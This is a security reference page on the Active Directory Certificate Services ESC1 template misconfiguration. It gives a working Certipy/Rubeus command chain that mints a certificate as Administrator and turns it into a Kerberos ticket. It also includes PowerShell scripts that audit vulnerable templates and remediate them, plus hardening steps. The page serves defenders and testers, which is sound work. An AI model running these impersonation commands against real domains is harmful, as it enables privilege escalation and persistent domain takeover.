Active Directory Certificate Services (ESC1)

Description

Active Directory Certificate Services (AD CS) issues X.509 certificates for logon, TLS, and mutual authentication. In the ESC1 misconfiguration, a certificate template has all of the following properties: (a) it includes Client Authentication (and often Smartcard Logon) EKUs; (b) low‑privileged principals can Enroll; and (c) the template allows the enrollee to supply the subject (UPN/SAN). Together these permit an attacker to mint a certificate for any target identity (e.g., Administrator), then authenticate via PKINIT/smartcard logon to obtain Kerberos tickets and persistent access that survives password changes.

Examples

Enumerate Vulnerable Templates

Use Certipy to find misconfigured templates with broad enrollment permissions and an enrollee-supplied subject:

certipy find -u [email protected] -p 'Passw0rd!' -dc-ip 10.0.0.10 -vulnerable -stdout

Look for templates with ClientAuth EKU and ENROLLEE_SUPPLIES_SUBJECT where “Authenticated Users” can Enroll.

Alternatively, enumerate via Windows tooling:

# Using Certify.exe (SharpADCS)
Certify.exe find /vulnerable

# Using built-in certutil
certutil -template -v | findstr /i "Enrollment Enrollee Supplies Subject Client Authentication SmartcardLogon"
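The same three conditions can be checked from the defender's side without third-party tooling. The following PowerShell audit is an added example (not from the original page, and not Certipy's or Certify's code): it reads the template objects from the Configuration partition with the RSAT ActiveDirectory module and reports templates where the enrollee supplies the subject, an authentication-capable EKU is present, and a broad principal holds the Enroll right. Like Certipy's `-vulnerable` check, it excludes templates gated by manager approval or by required authorized signatures. Flag bits, the Certificate-Enrollment right GUID and the EKU OIDs come from the AD CS template schema; the list of "broad" principals is an assumption you may extend.

```powershell
# Added example (not from the original page): audit AD CS templates for the
# three ESC1 conditions with the RSAT ActiveDirectory module.
# Assumes a domain-joined host where Get-ADRootDSE / Get-ADObject can reach a DC.
Import-Module ActiveDirectory

# Template flag bits and EKU OIDs (AD CS template schema, MS-CRTD).
$CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT = 0x00000001   # in msPKI-Certificate-Name-Flag
$CT_FLAG_PEND_ALL_REQUESTS         = 0x00000002   # in msPKI-Enrollment-Flag: manager approval
$EnrollRightGuid = [Guid]'0e10c968-78fb-11d2-90d4-00c04f79dc55'   # Certificate-Enrollment extended right
$AuthEkus = @(
    '1.3.6.1.5.5.7.3.2',        # Client Authentication
    '1.3.6.1.4.1.311.20.2.2',   # Smart Card Logon
    '1.3.6.1.5.2.3.4',          # PKINIT Client Authentication
    '2.5.29.37.0'               # Any Purpose
)
# Principals that make a template reachable by low-privileged users (assumed list; extend as needed).
$BroadSids      = @('S-1-1-0', 'S-1-5-11')   # Everyone, Authenticated Users
$BroadRidSuffix = '-(513|515)$'              # Domain Users, Domain Computers

function Get-Esc1Template {
    $configNc = (Get-ADRootDSE).configurationNamingContext
    $base     = "CN=Certificate Templates,CN=Public Key Services,CN=Services,$configNc"
    $props    = 'msPKI-Certificate-Name-Flag', 'msPKI-Enrollment-Flag', 'msPKI-RA-Signature',
                'pKIExtendedKeyUsage', 'nTSecurityDescriptor'

    Get-ADObject -SearchBase $base -Filter "objectClass -eq 'pKICertificateTemplate'" -Properties $props |
    ForEach-Object {
        $t    = $_
        $ekus = @($t.pKIExtendedKeyUsage | Where-Object { $_ })

        # (c) enrollee supplies the subject/SAN, with no manager-approval or RA-signature gate
        $suppliesSubject = ([int]$t.'msPKI-Certificate-Name-Flag' -band $CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT) -ne 0
        $gated = (([int]$t.'msPKI-Enrollment-Flag' -band $CT_FLAG_PEND_ALL_REQUESTS) -ne 0) -or
                 ([int]$t.'msPKI-RA-Signature' -gt 0)

        # (a) an EKU usable for authentication; an empty EKU list means "all purposes"
        $authEku = ($ekus.Count -eq 0) -or (@($ekus | Where-Object { $AuthEkus -contains $_ }).Count -gt 0)

        # (b) Enroll (or GenericAll) granted to a broad principal
        $broadEnrollers = foreach ($ace in $t.nTSecurityDescriptor.Access) {
            if ($ace.AccessControlType -ne 'Allow') { continue }
            $rights = $ace.ActiveDirectoryRights
            $enroll = $rights.HasFlag([System.DirectoryServices.ActiveDirectoryRights]::GenericAll) -or
                      ($rights.HasFlag([System.DirectoryServices.ActiveDirectoryRights]::ExtendedRight) -and
                       ($ace.ObjectType -eq $EnrollRightGuid -or $ace.ObjectType -eq [Guid]::Empty))
            if (-not $enroll) { continue }
            try   { $sid = $ace.IdentityReference.Translate([System.Security.Principal.SecurityIdentifier]).Value }
            catch { continue }   # unresolvable (orphaned) SID: not a broad group
            if ($BroadSids -contains $sid -or $sid -match $BroadRidSuffix) { $ace.IdentityReference.Value }
        }

        if ($suppliesSubject -and -not $gated -and $authEku -and $broadEnrollers) {
            [pscustomobject]@{
                Template       = $t.Name
                EKUs           = ($ekus -join ', ')
                BroadEnrollers = (($broadEnrollers | Sort-Object -Unique) -join '; ')
            }
        }
    }
}

Get-Esc1Template | Format-Table -AutoSize
```

Run it as any domain user; reading template objects and their security descriptors needs no special rights. A template listed here is only reachable through a CA that actually publishes it, so cross-check the CA's `certificateTemplates` attribute under `CN=Enrollment Services` before prioritising fixes, and treat the EKUs column as the reason the template can be used for logon.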

Request a Certificate Impersonating an Admin

Request a certificate for [email protected] using the vulnerable template:

certipy req -u [email protected] -p 'Passw0rd!' -target ca01.corp.local \
  -template VulnerableTemplate -upn [email protected] -debug

Authenticate With the Issued Certificate

Convert and use the certificate to obtain a TGT or logon:

# Kerberos (PKINIT)
certipy auth -pfx administrator.pfx -dc-ip 10.0.0.10

This yields a TGT for Administrator, enabling further access.

You can also inject the TGT directly on a domain-joined host with Rubeus:

# Convert PFX to base64 or a .pem/.crt+.key and import as needed
Rubeus asktgt /user:Administrator /certificate:admin.pfx /password:PfxPassword /ptt

Remediation

  1. Harden certificate templates
    • Remove ClientAuth/SmartcardLogon EKUs where not required.
    • Disable ENROLLEE_SUPPLIES_SUBJECT on the template, and block SAN/UPN override at the CA by disabling the EDITF_ATTRIBUTESUBJECTALTNAME2 policy flag.
  2. Restrict enrollment permissions
    • Remove broad groups (e.g., Authenticated Users) from sensitive templates.
    • Delegate enrollment only to dedicated, audited security groups.
  3. Limit impact and monitor
    • Shorten certificate lifetimes; enable revocation and auditing on issuance.
    • Alert on requests where SAN/UPN differs from the requester identity.
  4. Reduce external exposure
    • Disable legacy Web Enrollment on CAs not requiring it; require HTTPS and authentication; prefer offline enrollment flows.
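Steps 1 and 3 above can be scripted. The following PowerShell is an added example (not from the original page): `Disable-EnrolleeSuppliesSubject` clears the CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT bit on a named template via Set-ADObject and honours `-WhatIf`, and `Find-MismatchedIssuance` reads the CA database with `certutil -view` and returns issued certificates whose UPN is not the UPN of the account that requested them, which is the "SAN/UPN differs from the requester" condition from step 3. The template name `VulnerableTemplate` is the page's placeholder; the `-config` value format and the assumption that certutil's `csv` output has one header row followed by one row per record are mine.

```powershell
# Added example (not from the original page). Two defender actions for the
# remediation steps above: clear ENROLLEE_SUPPLIES_SUBJECT on a template, and
# list issued certificates whose UPN differs from the requesting account.
# Assumes the RSAT ActiveDirectory module and certutil.exe (RSAT or the CA host).
Import-Module ActiveDirectory

$CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT = 0x00000001   # msPKI-Certificate-Name-Flag bit

function Disable-EnrolleeSuppliesSubject {
    [CmdletBinding(SupportsShouldProcess = $true)]
    param([Parameter(Mandatory = $true)][string]$TemplateName)

    $configNc = (Get-ADRootDSE).configurationNamingContext
    $dn = "CN=$TemplateName,CN=Certificate Templates,CN=Public Key Services,CN=Services,$configNc"
    $t = Get-ADObject -Identity $dn -Properties 'msPKI-Certificate-Name-Flag'
    $flags = [int]$t.'msPKI-Certificate-Name-Flag'
    if (($flags -band $CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT) -eq 0) {
        Write-Verbose "$TemplateName already has its subject built by the CA; nothing to do"
        return
    }
    $newFlags = $flags -band (-bnot $CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT)   # clear only that bit
    if ($PSCmdlet.ShouldProcess($dn, "msPKI-Certificate-Name-Flag $flags -> $newFlags")) {
        Set-ADObject -Identity $dn -Replace @{ 'msPKI-Certificate-Name-Flag' = $newFlags }
    }
}

function Find-MismatchedIssuance {
    # Returns issued certificates (Disposition 20) whose UPN SAN is not the requester's own UPN.
    param([string]$CaConfig)   # e.g. 'ca01.corp.local\corp-CA01-CA' (assumed name); empty = local default CA

    $cuArgs = @()
    if ($CaConfig) { $cuArgs += '-config', $CaConfig }
    $cuArgs += '-view', '-restrict', 'Disposition=20',
               '-out', 'RequestID,Request.RequesterName,CertificateTemplate,UPN,NotBefore', 'csv'
    $rows = & certutil.exe @cuArgs |
            ConvertFrom-Csv -Header RequestID, Requester, Template, UPN, NotBefore |
            Select-Object -Skip 1    # drop certutil's own (display-name) header row (assumed layout)

    $upnCache = @{}
    foreach ($r in $rows) {
        if (-not $r.UPN -or -not $r.Requester) { continue }   # no UPN in the certificate: nothing to compare
        $sam = ($r.Requester -split '\\')[-1]                  # "CORP\jdoe" -> "jdoe"
        if ($sam.EndsWith('$')) { continue }                   # machine accounts use DNS SANs; out of scope here
        if (-not $upnCache.ContainsKey($sam)) {
            $upn = $null
            try { $upn = (Get-ADUser -Identity $sam -Properties UserPrincipalName).UserPrincipalName } catch { }
            $upnCache[$sam] = $upn                             # $null when the requester no longer exists
        }
        if (-not $upnCache[$sam] -or $upnCache[$sam] -ne $r.UPN) {
            [pscustomobject]@{
                RequestID    = $r.RequestID
                Requester    = $r.Requester
                RequesterUPN = $upnCache[$sam]
                IssuedUPN    = $r.UPN
                Template     = $r.Template
                NotBefore    = $r.NotBefore
            }
        }
    }
}

# Preview the template change without applying it, then review issuance history.
Disable-EnrolleeSuppliesSubject -TemplateName 'VulnerableTemplate' -WhatIf
Find-MismatchedIssuance | Format-Table -AutoSize
```

Two caveats. Clearing the flag only stops the enrollee from naming the subject; the template must then have a subject-name source configured (the "Build from this Active Directory information" options, which set other bits in msPKI-Certificate-Name-Flag) or the CA will reject requests for lacking a subject, so set that in the Certificate Templates console if it is not already there, and allow for AD replication before re-running the audit. The mismatch list will also contain legitimate enrollment-agent requests and accounts whose UPN changed after issuance, so treat it as a review queue: anything issued to a privileged UPN from an unrelated requester on an ESC1-capable template should be revoked, and the revocation published, since a password change does not invalidate the certificate.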